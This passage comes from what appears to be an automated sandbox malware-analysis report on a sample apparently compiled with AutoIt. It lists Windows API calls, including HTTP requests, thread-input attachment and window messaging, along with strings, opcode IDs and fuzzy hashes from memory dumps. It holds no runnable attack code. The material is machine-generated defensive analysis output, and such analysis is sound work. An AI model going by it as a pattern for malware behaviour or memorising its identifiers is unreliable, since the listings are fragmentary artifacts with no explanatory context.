                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                            • API String ID: 707087890-567219261
                                                                                                            • Opcode ID: edeab89c09f8e03338298d85228cdc3ad13e14e58f3e24aef50e9e0c9bdec863
                                                                                                            • Instruction ID: 700276ba63f96f2bb62f827b983462dcaae5a1ab112eb34fa0efa5ae9f687b1a
                                                                                                            • Opcode Fuzzy Hash: edeab89c09f8e03338298d85228cdc3ad13e14e58f3e24aef50e9e0c9bdec863
                                                                                                            • Instruction Fuzzy Hash: 2751AF31A001169BCF25DF68C8519BEB7A6EF64720B24422AF866E73C4DB31DD40DBB0
                                                                                                            APIs
                                                                                                            • CoInitialize.OLE32 ref: 00DD3774
                                                                                                            • CoUninitialize.OLE32 ref: 00DD377F
                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00DEFB78,?), ref: 00DD37D9
                                                                                                            • IIDFromString.OLE32(?,?), ref: 00DD384C
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00DD38E4
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DD3936
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                            • API String ID: 636576611-1287834457
                                                                                                            • Opcode ID: 86a020c5c47e227594af2f80662531410a06d5e32bc89b8865e7ef89fd9ed212
                                                                                                            • Instruction ID: da6c6daf63d365ef617f1b21e731df9256ceb089c6a35743fa2ac8ee931d05b7
                                                                                                            • Opcode Fuzzy Hash: 86a020c5c47e227594af2f80662531410a06d5e32bc89b8865e7ef89fd9ed212
                                                                                                            • Instruction Fuzzy Hash: 36618AB1608701AFD310DF54D889B6ABBE8EF48710F14090AF9859B391D770EE49DBB2
                                                                                                            APIs
                                                                                                            • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00DC33CF
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DC33F0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString$_wcslen
                                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                            • API String ID: 4099089115-3080491070
                                                                                                            • Opcode ID: 13eaf10f8a6da7c7c3f310e23c1704c5e068279857397d888459d27ec9c53ad9
                                                                                                            • Instruction ID: f9de180f670e6e92fb50a47cc506d67078b7639981174e7a61ca03272ea02ef3
                                                                                                            • Opcode Fuzzy Hash: 13eaf10f8a6da7c7c3f310e23c1704c5e068279857397d888459d27ec9c53ad9
                                                                                                            • Instruction Fuzzy Hash: D051797290020AAADF15EBA0CD52EEEB779EF14341F244165F905730A2EB316F99CB70
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                            • API String ID: 1256254125-769500911
                                                                                                            • Opcode ID: 6ad15218f09500dca10aa99b01fff82265be3f77eac72aa4a00faaf782a882a1
                                                                                                            • Instruction ID: 99cc6154f2e853f21b9efd8b6e97aa20e636e63ae656d6fa73455d42f912e074
                                                                                                            • Opcode Fuzzy Hash: 6ad15218f09500dca10aa99b01fff82265be3f77eac72aa4a00faaf782a882a1
                                                                                                            • Instruction Fuzzy Hash: 8441B632A00126DBCB205F7D88915FE7BA5ABA0774B28412BE466DF284E771CD81C7B0
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00DC53A0
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DC5416
                                                                                                            • GetLastError.KERNEL32 ref: 00DC5420
                                                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 00DC54A7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                            • API String ID: 4194297153-14809454
                                                                                                            • Opcode ID: 12c313aa49164c4c00ee92791fb2155e24e80b77d8bf502cea106b11a24ad4bc
                                                                                                            • Instruction ID: 27b75c66efd9feb9e30cdde1960b383220ec431eb7fcd0f7b61b34ae2ac2874c
                                                                                                            • Opcode Fuzzy Hash: 12c313aa49164c4c00ee92791fb2155e24e80b77d8bf502cea106b11a24ad4bc
                                                                                                            • Instruction Fuzzy Hash: 2C31B335A046059FCB15DF68D885FA97BB4EB45305F188059E801DB256DB30EDC6CBB0
                                                                                                            APIs
                                                                                                            • CreateMenu.USER32 ref: 00DE3C79
                                                                                                            • SetMenu.USER32(?,00000000), ref: 00DE3C88
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DE3D10
                                                                                                            • IsMenu.USER32(?), ref: 00DE3D24
                                                                                                            • CreatePopupMenu.USER32 ref: 00DE3D2E
                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DE3D5B
                                                                                                            • DrawMenuBar.USER32 ref: 00DE3D63
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                            • String ID: 0$F
                                                                                                            • API String ID: 161812096-3044882817
                                                                                                            • Opcode ID: ded177b6ccc5f1c74057b795389d2af2b66afa77a663457a72b6ff34d21b8686
                                                                                                            • Instruction ID: f6c00e42977a44833abf4e7dcb9cb3176dbc6892b65dd27130d2c46bf450f6a8
                                                                                                            • Opcode Fuzzy Hash: ded177b6ccc5f1c74057b795389d2af2b66afa77a663457a72b6ff34d21b8686
                                                                                                            • Instruction Fuzzy Hash: 55416D75A01349EFDB14EF65D888AAA77B5FF49350F180028F946AB360D730AA11CFA0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00DB1F64
                                                                                                            • GetDlgCtrlID.USER32 ref: 00DB1F6F
                                                                                                            • GetParent.USER32 ref: 00DB1F8B
                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DB1F8E
                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00DB1F97
                                                                                                            • GetParent.USER32(?), ref: 00DB1FAB
                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00DB1FAE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 711023334-1403004172
                                                                                                            • Opcode ID: 88658db8afbf9816765f13c33e50c91df757ff8e7a1585b97a91253daf42c204
                                                                                                            • Instruction ID: 710f2f19b80bfb5abfa1130795cab207b0b7b631f01d89b97a651b43ce19b8b2
                                                                                                            • Opcode Fuzzy Hash: 88658db8afbf9816765f13c33e50c91df757ff8e7a1585b97a91253daf42c204
                                                                                                            • Instruction Fuzzy Hash: DF21BE75900214FBCF04AFA0CC95DFEBBB9EF19310B501519BD66A72A1CB349919DB70
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DE3A9D
                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DE3AA0
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00DE3AC7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DE3AEA
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DE3B62
                                                                                                            • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00DE3BAC
                                                                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00DE3BC7
                                                                                                            • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00DE3BE2
                                                                                                            • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00DE3BF6
                                                                                                            • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00DE3C13
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 312131281-0
                                                                                                            • Opcode ID: 3fec922e5cb8fb01e9ea008da3324c5bb1701e05acf5d8de7dc352904cb45b43
                                                                                                            • Instruction ID: 197570893de2e392ad1c9db449fbb97fa596ee448f17f6b09c91df6cc65e869c
                                                                                                            • Opcode Fuzzy Hash: 3fec922e5cb8fb01e9ea008da3324c5bb1701e05acf5d8de7dc352904cb45b43
                                                                                                            • Instruction Fuzzy Hash: DA617D75900248AFDB10EF68CC85EFE77B8EB49700F140199FA15A72A1C770AE45DB60
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00DBB151
                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB165
                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00DBB16C
                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB17B
                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DBB18D
                                                                                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB1A6
                                                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB1B8
                                                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB1FD
                                                                                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB212
                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00DBA1E1,?,00000001), ref: 00DBB21D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                            • String ID:
                                                                                                            • API String ID: 2156557900-0
                                                                                                            • Opcode ID: 1ea8a697dbca493ae1efc9a9048ff4d9a5106fd854ea8a5877078adc82c6ec6e
                                                                                                            • Instruction ID: 25b19f0c72518d15fe9d250ffb2df7c76909af2698466b90df3fd3e4adcadf39
                                                                                                            • Opcode Fuzzy Hash: 1ea8a697dbca493ae1efc9a9048ff4d9a5106fd854ea8a5877078adc82c6ec6e
                                                                                                            • Instruction Fuzzy Hash: FB318271610304EFDB20AF25DC84FAE7B6ABB51361F14500AF912EA250D7F49D468F74
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00D82C94
                                                                                                              • Part of subcall function 00D829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
                                                                                                              • Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0
                                                                                                            • _free.LIBCMT ref: 00D82CA0
                                                                                                            • _free.LIBCMT ref: 00D82CAB
                                                                                                            • _free.LIBCMT ref: 00D82CB6
                                                                                                            • _free.LIBCMT ref: 00D82CC1
                                                                                                            • _free.LIBCMT ref: 00D82CCC
                                                                                                            • _free.LIBCMT ref: 00D82CD7
                                                                                                            • _free.LIBCMT ref: 00D82CE2
                                                                                                            • _free.LIBCMT ref: 00D82CED
                                                                                                            • _free.LIBCMT ref: 00D82CFB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 1f61f02d19df9127bdc48699408e8489c461c019d57733f565008cdb65a7cc9c
                                                                                                            • Instruction ID: fd8c2c17b9dad9346c04f91351f0b77e3ca99e739b2039a3d8e16b596e49d414
                                                                                                            • Opcode Fuzzy Hash: 1f61f02d19df9127bdc48699408e8489c461c019d57733f565008cdb65a7cc9c
                                                                                                            • Instruction Fuzzy Hash: 84115076540108BFCB02FF54D982CAD3BA5FF05350F5245A5FA489B222DB35EA509FB0
                                                                                                            APIs
                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D51459
                                                                                                            • OleUninitialize.OLE32(?,00000000), ref: 00D514F8
                                                                                                            • UnregisterHotKey.USER32(?), ref: 00D516DD
                                                                                                            • DestroyWindow.USER32(?), ref: 00D924B9
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00D9251E
                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D9254B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                            • String ID: close all
                                                                                                            • API String ID: 469580280-3243417748
                                                                                                            • Opcode ID: b60c67159f72e0420f7c5e3f3a5a736850c66e783eae59eb529df2a539b8068e
                                                                                                            • Instruction ID: a81d00fdd1493b127bfca5ddf951257a96b469c464144a9fe811c98ef1b0071c
                                                                                                            • Opcode Fuzzy Hash: b60c67159f72e0420f7c5e3f3a5a736850c66e783eae59eb529df2a539b8068e
                                                                                                            • Instruction Fuzzy Hash: C1D136356012129FCF29EF15C899B29F7A4FF05701F1542ADE84AAB252DB31AD1ACF70
                                                                                                            APIs
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DC7FAD
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC7FC1
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00DC7FEB
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00DC8005
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8017
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC8060
                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DC80B0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                            • String ID: *.*
                                                                                                            • API String ID: 769691225-438819550
                                                                                                            • Opcode ID: 973fd1e62eefee4fc82b2e0fc52cdd5f9800e8c07f171515f8e62f4fe086ca7d
                                                                                                            • Instruction ID: 78decca34f5cfd9719ef8b892d6fca578bf47f8a0b8b7fc8bd6ccfa2c99f757b
                                                                                                            • Opcode Fuzzy Hash: 973fd1e62eefee4fc82b2e0fc52cdd5f9800e8c07f171515f8e62f4fe086ca7d
                                                                                                            • Instruction Fuzzy Hash: D9817D725083429BCB20EF54C884EAAB3E8BF89351F18485EF885D7250EB34DD499F72
                                                                                                            APIs
                                                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00D55C7A
                                                                                                              • Part of subcall function 00D55D0A: GetClientRect.USER32(?,?), ref: 00D55D30
                                                                                                              • Part of subcall function 00D55D0A: GetWindowRect.USER32(?,?), ref: 00D55D71
                                                                                                              • Part of subcall function 00D55D0A: ScreenToClient.USER32(?,?), ref: 00D55D99
                                                                                                            • GetDC.USER32 ref: 00D946F5
                                                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D94708
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00D94716
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00D9472B
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00D94733
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D947C4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                            • String ID: U
                                                                                                            • API String ID: 4009187628-3372436214
                                                                                                            • Opcode ID: 5c46690813b0a7e2560abec8b48fb91f50dfc4eb204f4cbda916d6a095915cb6
                                                                                                            • Instruction ID: f74afb027ce6c041e396f68eb13afcfaf32bfbb95c89fc7a87d789ef131bee6a
                                                                                                            • Opcode Fuzzy Hash: 5c46690813b0a7e2560abec8b48fb91f50dfc4eb204f4cbda916d6a095915cb6
                                                                                                            • Instruction Fuzzy Hash: 6671BE31400209DFCF229FA4C984EBA3BB5FF4A365F184269ED555A26AC7319846DFB0
                                                                                                            APIs
                                                                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00DC35E4
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • LoadStringW.USER32(00E22390,?,00000FFF,?), ref: 00DC360A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LoadString$_wcslen
                                                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                            • API String ID: 4099089115-2391861430
                                                                                                            • Opcode ID: 5004f2189b0b9b63fb8cb61eece12d5d4246531623054dc29c3846bedae5974d
                                                                                                            • Instruction ID: a447885207d3bded968827e05434e62270cd5f1fac1b23cb621eb709b40bbea4
                                                                                                            • Opcode Fuzzy Hash: 5004f2189b0b9b63fb8cb61eece12d5d4246531623054dc29c3846bedae5974d
                                                                                                            • Instruction Fuzzy Hash: 82517D7280024ABADF14EBA0CC52EEDBB75EF14341F144169F915721A1EB306B99DF70
                                                                                                            APIs
                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DCC272
                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DCC29A
                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DCC2CA
                                                                                                            • GetLastError.KERNEL32 ref: 00DCC322
                                                                                                            • SetEvent.KERNEL32(?), ref: 00DCC336
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00DCC341
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
